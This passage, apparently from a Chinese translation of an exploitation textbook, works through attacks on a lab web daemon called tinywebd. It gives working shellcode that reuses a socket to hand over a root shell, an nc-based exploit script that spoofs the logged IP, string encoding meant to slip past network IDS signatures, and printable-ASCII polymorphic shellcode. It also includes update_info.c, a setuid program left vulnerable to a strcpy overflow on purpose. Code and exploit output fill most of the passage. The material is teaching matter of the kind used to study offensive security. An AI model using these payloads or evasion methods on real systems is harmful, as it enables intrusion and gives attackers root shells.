83         unsigned char *ptr, request[500], resource[500], log_buffer[500];
84         int fd, length;
85
86         length = recv_line(sockfd, request);
(gdb) break 86
Breakpoint 1 at 0x8048fc3: file tinywebd.c, line 86.
(gdb) cont
Continuing.

在设置断点并继续程序之后，另一个终端中的静默利用工具被用来连接并推进执行。

Breakpoint 1, handle_connection (sockfd=13, client_addr_ptr=0xbffff810, logfd=3) at
tinywebd.c:86
86         length = recv_line(sockfd, request);
(gdb) x/x &sockfd
0xbffff7e0:     0x0000000d
(gdb) x/x &new_sockfd
No symbol "new_sockfd" in current context.
(gdb) bt
#0  handle_connection (sockfd=13, client_addr_ptr=0xbffff810, logfd=3) at tinywebd.c:86
#1  0x08048fb7 in main () at tinywebd.c:72
(gdb) select-frame 1
(gdb) x/x &new_sockfd
0xbffff83c:     0x0000000d
(gdb) quit
The program is running.  Quit anyway (and detach it)? (y or n) y
Detaching from program: , process 478
reader@hacking:~/booksrc $

这个调试输出显示 new_sockfd 存储在 main 函数的栈帧中的 0xbffff83c。利用这个信息，我们可以创建使用此处存储的套接字文件描述符的 shellcode，而不是创建新的连接。

虽然我们可以直接使用这个地址，但有许多小事情可能会改变栈内存的位置。如果发生这种情况，并且 shellcode 使用硬编码的栈地址，则利用将失败。为了使 shellcode 更可靠，可以借鉴编译器处理栈变量的方式。如果我们使用相对于 ESP 的地址，那么即使栈移动了一点点，new_sockfd 的地址仍然会正确，因为从 ESP 的偏移量将是相同的。如您从使用 mark_break shellcode 进行调试中记得的那样，ESP 是 0xbffff7e0。使用这个值作为 ESP，偏移量显示为 0x5c 字节。

reader@hacking:~/booksrc $ gdb -q
(gdb) print /x 0xbffff83c - 0xbffff7e0
$1 = 0x5c
(gdb)

以下 shellcode 重新使用现有的套接字以用于 root shell。

socket_reuse_restore.s

BITS 32

   push BYTE 0x02    ; Fork is syscall #2
   pop eax
   int 0x80          ; After the fork, in child process eax == 0.
   test eax, eax
   jz child_process  ; In child process spawns a shell.

      ; In the parent process, restore tinywebd.
   lea ebp, [esp+0x68]  ; Restore EBP.
   push 0x08048fb7      ; Return address.
   ret                  ; Return.

child_process:
      ; Re-use existing socket.
   lea edx, [esp+0x5c]  ; Put the address of new_sockfd in edx.
   mov ebx, [edx]       ; Put the value of new_sockfd in ebx.
   push BYTE 0x02
   pop ecx          ; ecx starts at 2.
   xor eax, eax
   xor edx, edx
dup_loop:
   mov BYTE al, 0x3F ; dup2  syscall #63
   int 0x80          ; dup2(c, 0)
   dec ecx           ; Count down to 0.
   jns dup_loop      ; If the sign flag is not set, ecx is not negative.

; execve(const char *filename, char *const argv [], char *const envp[])
   mov BYTE al, 11   ; execve  syscall #11
   push edx          ; push some nulls for string termination.
   push 0x68732f2f   ; push "//sh" to the stack.
   push 0x6e69622f   ; push "/bin" to the stack.
   mov ebx, esp      ; Put the address of "/bin//sh" into ebx, via esp.
   push edx          ; push 32-bit null terminator to stack.
   mov edx, esp      ; This is an empty array for envp.
   push ebx          ; push string addr to stack above null terminator.
   mov ecx, esp      ; This is the argv array with string ptr.
   int 0x80          ; execve("/bin//sh", ["/bin//sh", NULL], [NULL])

为了有效地使用这个 shellcode，我们需要另一个利用工具，它允许我们发送利用缓冲区，但保持套接字用于进一步的 I/O。这个第二个利用脚本在利用缓冲区的末尾添加了一个额外的 cat - 命令。破折号参数表示标准输入。在标准输入上运行 cat 本身可能有些无意义，但当命令被管道传输到 netcat 时，这实际上将标准输入和输出绑定到 netcat 的网络套接字。下面的脚本连接到目标，发送利用缓冲区，然后保持套接字打开并从终端获取进一步的输入。这是通过对静默利用工具进行少量修改（以粗体显示）来实现的。

xtool_tinywebd_reuse.sh

#!/bin/sh
# Silent stealth exploitation tool for tinywebd
#    also spoofs IP address stored in memory
`#    reuses existing socket-use socket_reuse shellcode`

SPOOFIP="12.34.56.78"
SPOOFPORT="9090"

if [ -z "$2" ]; then  # if argument 2 is blank
   echo "Usage: $0 <shellcode file> <target IP>"
   exit
fi
FAKEREQUEST="GET / HTTP/1.1\x00"
FR_SIZE=$(perl -e "print \"$FAKEREQUEST\"" | wc -c | cut -f1 -d ' ')
OFFSET=540
RETADDR="\x24\xf6\xff\xbf" # at +100 bytes from buffer @ 0xbffff5c0
FAKEADDR="\xcf\xf5\xff\xbf" # +15 bytes from buffer @ 0xbffff5c0
echo "target IP: $2"
SIZE=`wc -c $1 | cut -f1 -d ' '`
echo "shellcode: $1 ($SIZE bytes)"
echo "fake request: \"$FAKEREQUEST\" ($FR_SIZE bytes)"
ALIGNED_SLED_SIZE=$(($OFFSET+4 - (32*4) - $SIZE - $FR_SIZE - 16))

echo "[Fake Request $FR_SIZE] [spoof IP 16] [NOP $ALIGNED_SLED_SIZE] [shellcode $SIZE]
 [ret
addr 128] [*fake_addr 8]"
(perl -e "print \"$FAKEREQUEST\"";
 ./addr_struct "$SPOOFIP" "$SPOOFPORT";
 perl -e "print \"\x90\"x$ALIGNED_SLED_SIZE";
 cat $1;
perl -e "print \"$RETADDR\"x32 . \"$FAKEADDR\"x2 . \"\x01\x00\x00\x00\r\n\"";
`cat` -;) | nc -v $2 80

当这个工具与 socket_reuse_restore shellcode 一起使用时，将使用用于 web 请求的相同套接字提供 root shell。下面的输出演示了这一点。

reader@hacking:~/booksrc $ nasm socket_reuse_restore.s
reader@hacking:~/booksrc $ hexdump -C socket_reuse_restore
00000000  6a 02 58 cd 80 85 c0 74  0a 8d 6c 24 68 68 b7 8f  |j.X..t.l$hh.|
00000010  04 08 c3 8d 54 24 5c 8b  1a 6a 02 59 31 c0 31 d2  |..T$\.j.Y1.1.|
00000020  b0 3f cd 80 49 79 f9 b0  0b 52 68 2f 2f 73 68 68  |.?.Iy..Rh//shh|
00000030  2f 62 69 6e 89 e3 52 89  e2 53 89 e1 cd 80        |/bin.R.S..|
0000003e
reader@hacking:~/booksrc $ ./tinywebd
Starting tiny web daemon.
reader@hacking:~/booksrc $ ./xtool_tinywebd_reuse.sh socket_reuse_restore 127.0.0.1
target IP: 127.0.0.1
shellcode: socket_reuse_restore (62 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request 15] [spoof IP 16] [NOP 323] [shellcode 62] [ret addr 128] [*fake_addr 8]
localhost [127.0.0.1] 80 (www) open
whoami
root

通过重新使用现有的套接字，这个利用甚至更安静，因为它不会创建任何额外的连接。更少的连接意味着更少的异常，这有助于检测任何对策。

货物走私

如前所述的网络 IDS 或 IPS 系统不仅可以跟踪连接，还可以检查数据包本身。通常，这些系统正在寻找表示攻击的图案。例如，一个简单的规则，寻找包含字符串/bin/sh的数据包，会捕获很多包含 shellcode 的数据包。我们的/bin/sh字符串已经稍微被混淆了，因为它以四个字节的块推送到堆栈，但网络 IDS 也可以寻找包含字符串/bin和//sh的数据包。

这类网络 IDS 签名可以相当有效地捕捉到使用从互联网下载的漏洞的脚本小子。然而，它们很容易被自定义的 shellcode 绕过，这些 shellcode 隐藏了任何明显的字符串。

字符串编码

为了隐藏字符串，我们将简单地给字符串中的每个字节加 5。然后，在字符串被推送到堆栈后，shellcode 将从堆栈上的每个字符串字节减去 5。这样就可以在堆栈上构建所需的字符串，以便在 shellcode 中使用，同时在传输过程中保持其隐藏。下面的输出显示了编码字节的计算。

reader@hacking:~/booksrc $ echo "/bin/sh" | hexdump -C
00000000  2f 62 69 6e 2f 73 68 0a                           |/bin/sh.|
00000008
reader@hacking:~/booksrc $ gdb -q
(gdb) print /x 0x0068732f + 0x05050505
$1 = 0x56d7834
(gdb) print /x 0x6e69622f + 0x05050505
$2 = 0x736e6734
(gdb) quit
reader@hacking:~/booksrc $

以下 shellcode 将这些编码的字节推送到堆栈，并在循环中解码它们。此外，还使用了两个int3指令在解码前后在 shellcode 中设置断点。这是使用 GDB 查看正在发生的事情的一种简单方法。

encoded_sockreuserestore_dbg.s

BITS 32

   push BYTE 0x02    ; Fork is syscall #2.
   pop eax
   int 0x80          ; After the fork, in child process eax == 0.
   test eax, eax
   jz child_process  ; In child process spawns a shell.

      ; In the parent process, restore tinywebd.
   lea ebp, [esp+0x68]  ; Restore EBP.
   push 0x08048fb7      ; Return address.
   ret                  ; Return

child_process:
    ; Re-use existing socket.
   lea edx, [esp+0x5c]  ; Put the address of new_sockfd in edx.
   mov ebx, [edx]       ; Put the value of new_sockfd in ebx.
   push BYTE 0x02
   pop ecx          ; ecx starts at 2.
   xor eax, eax
dup_loop:
   mov BYTE al, 0x3F ; dup2  syscall #63
   int 0x80          ; dup2(c, 0)
   dec ecx           ; Count down to 0.
   jns dup_loop      ; If the sign flag is not set, ecx is not negative

; execve(const char *filename, char *const argv [], char *const envp[])
   mov BYTE al, 11   ; execve  syscall #11
   push 0x056d7834   ; push "/sh\x00" encoded +5 to the stack.
   push 0x736e6734   ; push "/bin" encoded +5 to the stack.
   mov ebx, esp      ; Put the address of encoded "/bin/sh" into ebx.

int3 ; Breakpoint before decoding (REMOVE WHEN NOT DEBUGGING)

   push BYTE 0x8     ; Need to decode 8 bytes
   pop edx
decode_loop:
   sub BYTE [ebx+edx], 0x5
   dec edx
   jns decode_loop

int3  ; Breakpoint after decoding (REMOVE WHEN NOT DEBUGGING)

   xor edx, edx
   push edx          ; push 32-bit null terminator to stack.
   mov edx, esp      ; This is an empty array for envp.
   push ebx          ; push string addr to stack above null terminator.
   mov ecx, esp      ; This is the argv array with string ptr.
   int 0x80          ; execve("/bin//sh", ["/bin//sh", NULL], [NULL])

解码循环使用 EDX 寄存器作为计数器。它从 8 开始计数到 0，因为需要解码 8 个字节。在这种情况下，确切的堆栈地址并不重要，因为重要的部分都是相对地址的，所以下面的输出没有麻烦地附加到现有的 tinywebd 进程。

reader@hacking:~/booksrc $ gcc -g tinywebd.c
reader@hacking:~/booksrc $ sudo gdb -q ./a.out

warning: not using untrusted file "/home/reader/.gdbinit"
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) set disassembly-flavor intel
(gdb) set follow-fork-mode child
(gdb) run
Starting program: /home/reader/booksrc/a.out
Starting tiny web daemon..

由于断点实际上是 shellcode 的一部分，因此不需要从 GDB 设置一个。从另一个终端，shellcode 被汇编并使用 socket 重用漏洞工具。

从另一个终端

reader@hacking:~/booksrc $ nasm encoded_sockreuserestore_dbg.s
reader@hacking:~/booksrc $ ./xtool_tinywebd_reuse.sh encoded_socketreuserestore_dbg
 127.0.0.1
target IP: 127.0.0.1
shellcode: encoded_sockreuserestore_dbg (72 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request 15] [spoof IP 16] [NOP 313] [shellcode 72] [ret addr 128] [*fake_addr 8]
localhost [127.0.0.1] 80 (www) open

回到 GDB 窗口，shellcode 中的第一个int3指令被触发。从这里，我们可以验证字符串是否正确解码。

Program received signal SIGTRAP, Trace/breakpoint trap.
[Switching to process 12400]
0xbffff6ab in ?? ()
(gdb) x/10i $eip
0xbffff6ab:     push   0x8
0xbffff6ad:     pop    edx
0xbffff6ae:     sub    BYTE PTR [ebx+edx],0x5
0xbffff6b2:     dec    edx
0xbffff6b3:     jns    0xbffff6ae
0xbffff6b5     int3
0xbffff6b6:     xor    edx,edx
0xbffff6b8:     push   edx
0xbffff6b9:     mov    edx,esp
0xbffff6bb:     push   ebx
(gdb) x/8c $ebx
0xbffff738:     52 '4'  103 'g' 110 'n' 115 's' 52 '4'  120 'x' 109 'm' 5 '\005'
(gdb) cont
Continuing.
[tcsetpgrp failed in terminal_inferior: Operation not permitted]

Program received signal SIGTRAP, Trace/breakpoint trap.
0xbffff6b6 in ?? ()
(gdb) x/8c $ebx
0xbffff738:     47 '/'  98 'b'  105 'i' 110 'n' 47 '/'  115 's' 104 'h' 0 '\0'
(gdb) x/s $ebx
0xbffff738:      "/bin/sh"
(gdb)

现在解码已经验证，可以从 shellcode 中移除int3指令。以下输出显示了最终使用的 shellcode。

reader@hacking:~/booksrc $ sed -e 's/int3/;int3/g' encoded_sockreuserestore_dbg.s >
encoded_sockreuserestore.s
reader@hacking:~/booksrc $ diff encoded_sockreuserestore_dbg.s encoded_sockreuserestore.s
 33c33
< int3  ; Breakpoint before decoding  (REMOVE WHEN NOT DEBUGGING)
> ;int3  ; Breakpoint before decoding  (REMOVE WHEN NOT DEBUGGING)
42c42
< int3  ; Breakpoint after decoding  (REMOVE WHEN NOT DEBUGGING)
> ;int3  ; Breakpoint after decoding  (REMOVE WHEN NOT DEBUGGING)
reader@hacking:~/booksrc $ nasm encoded_sockreuserestore.s
reader@hacking:~/booksrc $ hexdump -C encoded_sockreuserestore
00000000  6a 02 58 cd 80 85 c0 74  0a 8d 6c 24 68 68 b7 8f  |j.X....t..l$hh..|
00000010  04 08 c3 8d 54 24 5c 8b  1a 6a 02 59 31 c0 b0 3f  |....T$\..j.Y1..?|
00000020  cd 80 49 79 f9 b0 0b 68  34 78 6d 05 68 34 67 6e  |..Iy...h4xm.h4gn|
00000030  73 89 e3 6a 08 5a 80 2c  13 05 4a 79 f9 31 d2 52  |s..j.Z.,..Jy.1.R|
00000040  89 e2 53 89 e1 cd 80                              |..S....|
00000047
reader@hacking:~/booksrc $ ./tinywebd
Starting tiny web daemon..
reader@hacking:~/booksrc $ ./xtool_tinywebd_reuse.sh encoded_sockreuserestore 127.0.0.1
target IP: 127.0.0.1
shellcode: encoded_sockreuserestore (71 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request 15] [spoof IP 16] [NOP 314] [shellcode 71] [ret addr 128] [*fake_addr 8]
localhost [127.0.0.1] 80 (www) open
whoami
root

如何隐藏雪橇

NOP sled 是另一种网络 IDS 和 IPS 容易检测到的签名。大块的0x90并不常见，所以如果网络安全机制看到这样的东西，它很可能是漏洞。为了避免这种签名，我们可以使用不同的单字节指令而不是 NOP。有几个单字节指令——为各种寄存器提供增量或减量指令——也是可打印的 ASCII 字符。

指令	十六进制	ASCII
inc eax	`0x40`	@
inc ebx	`0x43`	C
inc ecx	`0x41`	A
inc ecx	`0x42`	B
dec eax	`0x48`	H
dec ebx	`0x4B`	K
dec ecx	`0x49`	I
dec edx	`0x4A`	J

由于我们在使用这些寄存器之前将它们清零，我们可以安全地使用这些字节的随机组合来作为 NOP sled。创建一个新的利用工具，该工具使用字节的随机组合@, C, A, B, H, K, I和J而不是常规的 NOP sled，将留给读者作为练习。最简单的方法是编写一个 C 语言编写的 sled 生成程序，该程序与 BASH 脚本一起使用。这种修改将隐藏利用缓冲区，防止 IDS 寻找 NOP sled。

缓冲区限制

有时程序会对缓冲区施加某些限制。这种数据完整性检查可以防止许多漏洞。考虑以下示例程序，它用于更新虚构数据库中的产品描述。第一个参数是产品代码，第二个参数是更新后的描述。这个程序实际上并没有更新数据库，但它确实存在一个明显的漏洞。

缓冲区限制

update_info.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_ID_LEN 40
#define MAX_DESC_LEN 500

/* Barf a message and exit. */
void barf(char *message, void *extra) {
   printf(message, extra);
   exit(1);
}

/* Pretend this function updates a product description in a database. */
void update_product_description(char *id, char *desc)
{
   char product_code[5], description[MAX_DESC_LEN];

   printf("[DEBUG]: description is at %p\n", description);

   strncpy(description, desc, MAX_DESC_LEN);
   strcpy(product_code, id);

   printf("Updating product #%s with description \'%s\'\n", product_code, desc);
   // Update database
}

int main(int argc, char *argv[], char *envp[])
{
  int i;
  char *id, *desc;

  if(argc < 2)
     barf("Usage: %s <id> <description>\n", argv[0]);
  id = argv[1];   // id - Product code to update in DB 
  desc = argv[2]; // desc - Item description to update

  if(strlen(id) > MAX_ID_LEN) // id must be less than MAX_ID_LEN bytes.
     barf("Fatal: id argument must be less than %u bytes\n", (void *)MAX_ID_LEN);

  for(i=0; i < strlen(desc)-1; i++) { // Only allow printable bytes in desc.
     if(!(isprint(desc[i])))
        barf("Fatal: description argument can only contain printable bytes\n", NULL);
  }

  // Clearing out the stack memory (security)
  // Clearing all arguments except the first and second
  memset(argv[0], 0, strlen(argv[0]));
  for(i=3; argv[i] != 0; i++)
    memset(argv[i], 0, strlen(argv[i]));
  // Clearing all environment variables
  for(i=0; envp[i] != 0; i++)
    memset(envp[i], 0, strlen(envp[i]));

  printf("[DEBUG]: desc is at %p\n", desc);

  update_product_description(id, desc); // Update database.
}

尽管存在漏洞，代码确实尝试进行安全检查。产品 ID 参数的长度受到限制，描述参数的内容仅限于可打印字符。此外，出于安全原因，未使用的环境变量和程序参数被清除。第一个参数（id）对于 Shellcode 来说太小了，而且由于栈内存的其他部分被清除，只剩下了一个地方。

reader@hacking:~/booksrc $ gcc -o update_info update_info.c
reader@hacking:~/booksrc $ sudo chown root ./update_info
reader@hacking:~/booksrc $ sudo chmod u+s ./update_info
reader@hacking:~/booksrc $ ./update_info
Usage: ./update_info <id> <description>
reader@hacking:~/booksrc $ ./update_info OCP209 "Enforcement Droid"
[DEBUG]: description is at 0xbffff650
Updating product #OCP209 with description 'Enforcement Droid'
reader@hacking:~/booksrc $
reader@hacking:~/booksrc $ ./update_info $(perl -e 'print "AAAA"x10') blah
[DEBUG]: description is at 0xbffff650
Segmentation fault
reader@hacking:~/booksrc $ ./update_info $(perl -e 'print "\xf2\xf9\xff\xbf"x10') $(cat ./
shellcode.bin)
Fatal: description argument can only contain printable bytes
reader@hacking:~/booksrc $

此输出显示了示例用法，然后尝试利用有漏洞的strcpy()调用。尽管可以通过第一个参数（id）覆盖返回地址，但我们唯一可以放置 Shellcode 的地方是在第二个参数（desc）中。然而，这个缓冲区会检查非可打印字节。下面的调试输出确认，如果有一种方法可以将 Shellcode 放入描述参数中，则此程序可以被利用。

reader@hacking:~/booksrc $ gdb -q ./update_info
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1"
(gdb) run $(perl -e 'print "\xcb\xf9\xff\xbf"x10') blah
The program being debugged has been started already
Start it from the beginning? (y or n) y

Starting program: /home/reader/booksrc/update_info $(perl -e 'print "\xcb\xf9\xff\
xbf"x10')
blah
[DEBUG]: desc is at 0xbffff9cb
Updating product # with description 'blah'

Program received signal SIGSEGV, Segmentation fault.
0xbffff9cb in ?? ()
(gdb) i r eip
eip            0xbffff9cb       0xbffff9cb
(gdb) x/s $eip
0xbffff9cb:      "blah"
(gdb)

可打印输入验证是阻止利用的唯一因素。就像机场安检一样，这个输入验证循环检查所有进入的内容。虽然无法避免这个检查，但有一些方法可以绕过守卫将非法数据偷偷运过。

多态可打印 ASCII Shellcode

多态 Shellcode 指的是任何会改变自身的 Shellcode。上一节中的编码 Shellcode 在技术上属于多态，因为它在运行时修改了所使用的字符串。新的 NOP sled 使用可以组装成可打印 ASCII 字节的指令。还有其他指令也属于这个可打印范围（从0x33到0x7e）；然而，实际上这个集合相当小。

目标是编写能够绕过可打印字符检查的 Shellcode。尝试用如此有限的指令集编写复杂的 Shellcode 将是自虐的，因此，可打印 Shellcode 将使用简单的方法在栈上构建更复杂的 Shellcode。这样，可打印 Shellcode 实际上将成为生成真实 Shellcode 的指令。

第一步是找出一种方法来清零寄存器。不幸的是，各种寄存器上的 XOR 指令无法组装成可打印的 ASCII 字符范围。一个选项是使用 AND 位操作，当使用 EAX 寄存器时，它会组装成百分号字符（%）。and eax, 0x41414141的汇编指令将组装成可打印的机器代码%AAAA，因为十六进制的0x41是可打印字符A。

AND 操作按以下方式转换位：

1 and 1 = 1
0 and 0 = 0
1 and 0 = 0
0 and 1 = 0

由于结果为 1 的唯一情况是两个位都是 1，如果将两个相反的值 AND 到 EAX 上，EAX 将变为零。

    `Binary                                Hexadecimal`
    1000101010011100100111101001010       0x454e4f4a
AND 0111010001100010011000000110101   AND 0x3a313035
------------------------------------  --------------- 
    0000000000000000000000000000000       0x00000000

因此，通过使用两个彼此位逆的 32 位可打印值，可以在不使用任何空字节的情况下清零 EAX 寄存器，并且生成的汇编机器代码将是可打印的文本。

and eax, 0x454e4f4a  ; Assembles into %JONE
and eax, 0x3a313035  ; Assembles into %501:

因此，机器代码中的%JONE%501:将清零 EAX 寄存器。有趣。下面框中显示了其他一些可以组装成可打印 ASCII 字符的指令。

sub eax, 0x41414141    -AAAA
push eax               P
pop eax                X
push esp               T
pop esp                \

令人惊讶的是，这些说明与AND eax指令结合，足以构建将 shellcode 注入堆栈并执行它的加载器代码。一般技术是，首先将 ESP 设置在执行中的加载器代码之后（在较高的内存地址），然后从后向前构建 shellcode，通过将值推入堆栈来实现，如下所示。

由于堆栈向上增长（从较高内存地址到较低内存地址），当值推入堆栈时，ESP 会向后移动，而 EIP 会在加载器代码执行时向前移动。最终，EIP 和 ESP 会相遇，EIP 将继续执行新构建的 shellcode。

图 0x600-1。

首先，ESP 必须设置在可打印的加载器 shellcode 之后。使用 GDB 进行一点调试显示，在获得程序执行控制权后，ESP 在溢出缓冲区开始之前 555 字节（该缓冲区将包含加载器代码）。ESP 寄存器必须移动，使其在加载器代码之后，同时还要留出为新 shellcode 和加载器 shellcode 本身留出空间。大约 300 字节应该足够了，所以让我们给 ESP 加上 860 字节，使其在加载器代码开始之后 305 字节。这个值不需要非常精确，因为稍后会做出一些调整。由于唯一可用的指令是减法，可以通过从寄存器中减去足够的值来模拟加法，这样寄存器就会回绕。寄存器只有 32 位空间，所以给寄存器加 860 相当于从 2³²，即 4,294,966,436 中减去 860。然而，这个减法必须只使用可打印的值，所以我们将其分成三个指令，所有这些指令都使用可打印的操作数。

sub eax, 0x39393333  ; Assembles into -3399
sub eax, 0x72727550  ; Assembles into -Purr
sub eax, 0x54545421  ; Assembles into -!TTT

如 GDB 输出所确认的，从 32 位数字中减去这三个值等同于向其添加 860。

reader@hacking:~/booksrc $ gdb -q
(gdb) print  0 - 0x39393333 - 0x72727550 - 0x54545421
$1 = 860
(gdb)

目标是从 ESP 而不是 EAX 中减去这些值，但sub esp指令无法汇编成可打印的 ASCII 字符。因此，必须将 ESP 的当前值移动到 EAX 进行减法，然后将新的 EAX 值移动回 ESP。

然而，由于mov esp, eax和mov eax, esp这两条指令都无法汇编成可打印的 ASCII 字符，因此这个交换必须使用堆栈来完成。通过将源寄存器的值推送到堆栈，然后再从目标寄存器中弹出，可以使用push source和pop dest指令完成相当于mov dest, source的指令。幸运的是，EAX 和 ESP 寄存器的pop和push指令可以汇编成可打印的 ASCII 字符，因此所有这些都可以使用可打印的 ASCII 来完成。

这里是添加 860 到 ESP 的最终指令集。

push esp             ; Assembles into T
pop eax              ; Assembles into X

sub eax, 0x39393333  ; Assembles into -3399
sub eax, 0x72727550  ; Assembles into -Purr
sub eax, 0x54545421  ; Assembles into -!TTT

push eax             ; Assembles into P
pop esp              ; Assembles into \

这意味着TX-3399-Purr-!TTT-P\将在机器码中将 ESP 增加 860。到目前为止，一切顺利。现在必须构建 shellcode。

首先，必须将 EAX 清零；现在发现了一种方法。然后，通过使用更多的sub指令，必须将 EAX 寄存器设置为 shellcode 的最后四个字节，顺序相反。由于堆栈通常向上增长（向较低的内存地址），并且按照 FILO 顺序构建，因此推送到堆栈的第一个值必须是 shellcode 的最后四个字节。这些字节必须顺序相反，因为是小端字节序。以下输出显示了在前面章节中使用的标准 shellcode 的十六进制转储，这将由可打印加载器代码构建。

reader@hacking:~/booksrc $ hexdump -C ./shellcode.bin
00000000  31 c0 31 db 31 c9 99 b0  a4 cd 80 6a 0b 58 51 68  |1.1.1......j.XQh|
00000010  2f 2f 73 68 68 2f 62 69  6e 89 e3  *`51 89 e2 53`* `89`  |//shh/bin..Q..S.|
00000020  `e1 cd 80`                                          |...|

在这种情况下，最后四个字节用粗体表示；EAX 寄存器的正确值是0x80cde189。通过使用sub指令来环绕值，这很容易做到。然后，可以将 EAX 推送到堆栈。这会使 ESP 向上移动（向较低的内存地址），到达新推入值的末尾，为 shellcode 的下一个四个字节做好准备（在前面 shellcode 中用斜体表示）。使用更多的sub指令将 EAX 环绕到0x53e28951，然后将这个值推送到堆栈。随着这个过程对每个四个字节的块重复进行，shellcode 从后向前构建，向执行加载器代码。

00000000  *`31 c0 31`* `db 31 c9 99` b0  a4 cd 80 6a 0b 58 51 68  |1.1.1......j.XQh|
00000010  2f 2f 73 68 68 2f 62 69  6e 89 e3 *`51 89 e2 53`* `89`  |//shh/bin..Q..S.|
00000020  `e1 cd 80`                                          |...|

最终，到达了 shellcode 的开始部分，但在将0x99c931db推送到堆栈后，只剩下三个字节（在前面 shellcode 中用斜体表示）。通过在代码的开始插入一个单字节 NOP 指令，可以缓解这种情况，结果将0x31c03190值推送到堆栈——0x90是 NOP 指令的机器码。

原始 shellcode 的每个四个字节的块都是使用之前提到的可打印减法方法生成的。以下源代码是一个帮助计算必要可打印值的程序。

printable_helper.c

#include <stdio.h>
#include <sys/stat.h>
#include <ctype.h>
#include <time.h>
#include <stdlib.h>
#include <string.h>

#define CHR "%_01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ-"

int main(int argc, char* argv[])
{
   unsigned int targ, last, t[4], l[4];
   unsigned int try, single, carry=0;
   int len, a, i, j, k, m, z, flag=0;
   char word[3][4];
   unsigned char mem[70];

   if(argc < 2) {
      printf("Usage: %s <EAX starting value> <EAX end value>\n", argv[0]);
      exit(1);
   }

   srand(time(NULL));
   bzero(mem, 70);
   strcpy(mem, CHR);
   len = strlen(mem);
   strfry(mem); // Randomize
   last = strtoul(argv[1], NULL, 0);
   targ = strtoul(argv[2], NULL, 0);

   printf("calculating printable values to subtract from EAX..\n\n");
   t[3] = (targ & 0xff000000)>>24; // Splitting by bytes
   t[2] = (targ & 0x00ff0000)>>16;
   t[1] = (targ & 0x0000ff00)>>8;
   t[0] = (targ & 0x000000ff);
   l[3] = (last & 0xff000000)>>24;
   l[2] = (last & 0x00ff0000)>>16;
   l[1] = (last & 0x0000ff00)>>8;
   l[0] = (last & 0x000000ff);

   for(a=1; a < 5; a++) { // Value count
      carry = flag = 0;
      for(z=0; z < 4; z++) { // Byte count
         for(i=0; i < len; i++) {
            for(j=0; j < len; j++) {
               for(k=0; k < len; k++) {
                  for(m=0; m < len; m++)
                  {
                     if(a < 2) j = len+1;
                     if(a < 3) k = len+1;
                     if(a < 4) m = len+1;
                     try = t[z] + carry+mem[i]+mem[j]+mem[k]+mem[m];
                     single = (try & 0x000000ff);
                     if(single == l[z])
                     {
                        carry = (try & 0x0000ff00)>>8;
                        if(i < len) word[0][z] = mem[i];
                        if(j < len) word[1][z] = mem[j];
                        if(k < len) word[2][z] = mem[k];
                        if(m < len) word[3][z] = mem[m];
                        i = j = k = m = len+2;
                        flag++;
                     }
                  }
               }
            }
         }
      }
      if(flag == 4) { // If all 4 bytes found
         printf("start: 0x%08x\n\n", last);
         for(i=0; i < a; i++)
            printf("     - 0x%08x\n", *((unsigned int *)word[i]));
         printf("-------------------\n");
         printf("end:   0x%08x\n", targ);

         exit(0);
      }
   }

当这个程序运行时，它期望两个参数——EAX 的起始值和结束值。对于可打印的加载器 shellcode，EAX 以零开始，结束值应该是0x80cde189。这个值对应于 shellcode.bin 的最后四个字节。

reader@hacking:~/booksrc $ gcc -o printable_helper printable_helper.c
reader@hacking:~/booksrc $ ./printable_helper 0 0x80cde189
calculating printable values to subtract from EAX..

start: 0x00000000

     - 0x346d6d25
     - 0x256d6d25
     - 0x2557442d
-------------------
end:   0x80cde189
reader@hacking:~/booksrc $ hexdump -C ./shellcode.bin 
00000000  31 c0 31 db 31 c9 99 b0  a4 cd 80 6a 0b 58 51 68  |1.1.1......j.XQh|
00000010  2f 2f 73 68 68 2f 62 69  6e 89 e3 51 89 e2 53 `89`  |//shh/bin..Q..S.|
00000020  `e1 cd 80`                                          |...|
00000023
reader@hacking:~/booksrc $ ./printable_helper 0x80cde189 0x53e28951
calculating printable values to subtract from EAX..

start: 0x80cde189

     - 0x59316659
     - 0x59667766
     - 0x7a537a79
-------------------
end:   0x53e28951 
reader@hacking:~/booksrc $

上面的输出显示了所需的可打印值，以将清零的 EAX 寄存器绕回0x80cde189（以粗体显示）。接下来，EAX 应该再次绕回0x53e28951，以构建 shellcode 的下一个四个字节（反向构建）。这个过程重复进行，直到构建完所有的 shellcode。整个过程的代码如下所示。

printable.s

BITS 32
push esp                ; Put current ESP
pop eax                 ;   into EAX.
sub eax,0x39393333      ; Subtract printable values
sub eax,0x72727550      ;   to add 860 to EAX.
sub eax,0x54545421
push eax                ; Put EAX back into ESP.
pop esp                 ;   Effectively ESP = ESP + 860
and eax,0x454e4f4a
and eax,0x3a313035      ; Zero out EAX.

sub eax,0x346d6d25      ; Subtract printable values 
sub eax,0x256d6d25      ;   to make EAX = 0x80cde189.
sub eax,0x2557442d      ;   (last 4 bytes from shellcode.bin)
push eax                ; Push these bytes to stack at ESP.
sub eax,0x59316659      ; Subtract more printable values
sub eax,0x59667766      ;  to make EAX = 0x53e28951.
sub eax,0x7a537a79      ;  (next 4 bytes of shellcode from the end)

push eax
sub eax,0x25696969
sub eax,0x25786b5a
sub eax,0x25774625
push eax                ; EAX = 0xe3896e69
sub eax,0x366e5858
sub eax,0x25773939
sub eax,0x25747470
push eax                ; EAX = 0x622f6868
sub eax,0x25257725
sub eax,0x71717171
sub eax,0x5869506a
push eax                ; EAX = 0x732f2f68
sub eax,0x63636363
sub eax,0x44307744
sub eax,0x7a434957
push eax                ; EAX = 0x51580b6a
sub eax,0x63363663
sub eax,0x6d543057
push eax                ; EAX = 0x80cda4b0
sub eax,0x54545454
sub eax,0x304e4e25
sub eax,0x32346f25
sub eax,0x302d6137
push eax                ; EAX = 0x99c931db
sub eax,0x78474778
sub eax,0x78727272
sub eax,0x774f4661
push eax                ; EAX = 0x31c03190
sub eax,0x41704170
sub eax,0x2d772d4e
sub eax,0x32483242
push eax                ; EAX = 0x90909090
push eax
push eax                ; Build a NOP sled.
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
